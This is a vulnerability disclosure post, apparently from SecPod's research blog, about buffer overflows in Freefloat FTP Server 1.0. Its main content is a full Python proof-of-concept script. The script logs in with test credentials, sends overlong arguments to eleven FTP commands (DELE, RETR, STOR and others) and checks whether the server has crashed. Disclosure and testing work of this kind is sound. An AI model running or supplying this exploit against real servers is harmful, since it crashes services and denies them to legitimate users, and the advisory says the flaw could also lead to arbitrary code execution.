Freefloat FTP Server POST Auth Multiple Commands Buffer Overflow Vulnerabilities

SecPod Research Team member (Veerendra G.G) has found multiple Buffer Overflow vulnerabilities in Freefloat FTP Server. The flaws are caused due to input validation errors while processing DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT commands. The buffer is overflown by sending overly long command arguments, which can be exploited to execute arbitrary code or crash a vulnerable server denying service to legitimate users.

POC : Download here.

More information on the flaws can be found here.


#!/usr/bin/python
##############################################################################
# Title     : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory  : https://www.secpod.com/blog/?p=310
#             http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
#             http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version   : Freefloat FTP Server Version 1.0
# Date      : 21/07/2011
##############################################################################

import sys, socket

def exploit(HOST, PORT, CMD):
    try:
        tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp_sock.connect((HOST, PORT))
    except Exception, msg:
        print "[-] Not able to connect to : " , HOST
        sys.exit(0)

    res = tcp_sock.recv(1024)

    if "220 FreeFloat" not in res:
        print "[-] FreeFloat FTP Server Not Found..."
        tcp_sock.close()
        sys.exit(0)

    tcp_sock.send("USER test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send("PASS test\r\n")
    tcp_sock.recv(1024)

    tcp_sock.send(CMD + " "+ "A" * 1000 + "\r\n")
    tcp_sock.close()

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\t[-] Usage: python exploit.py target_ip"
        print "\t[-] Example : python exploit.py 127.0.0.1"
        print "\t[-] Exiting..."
        sys.exit(0)

    HOST = sys.argv[1]
    PORT = 21

    ## Vulnerable Commands
    CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR",
            "RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"]

    for CMD in CMDs:
        print "[+] Connecting with server..."
        exploit(HOST, PORT, CMD)
        print "[+] Exploit Sent with %s command..." %(CMD)
        print "[+] Checking Server Crashed or not..."

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            s.close()
        except Exception, msg:
            print "[+] Server Crashed with %s Command" %(CMD)
            sys.exit(0)

Welcome any feedback or suggestion. Read more about SecPod’s SanerNow Vulnerability Management, Patch Management, and Endpoint Management.
Cheers!
SecPod Research Team

Subscribe For More Posts Like This

Get the latest research, best practices, industry trends and cybersecurity blogs from SecPod security experts

Invalid email address
We promise not to spam you. You can unsubscribe at any time.
0 0 votes
Article Rating
Subscribe
Notify of
0 Comments
Inline Feedbacks
View all comments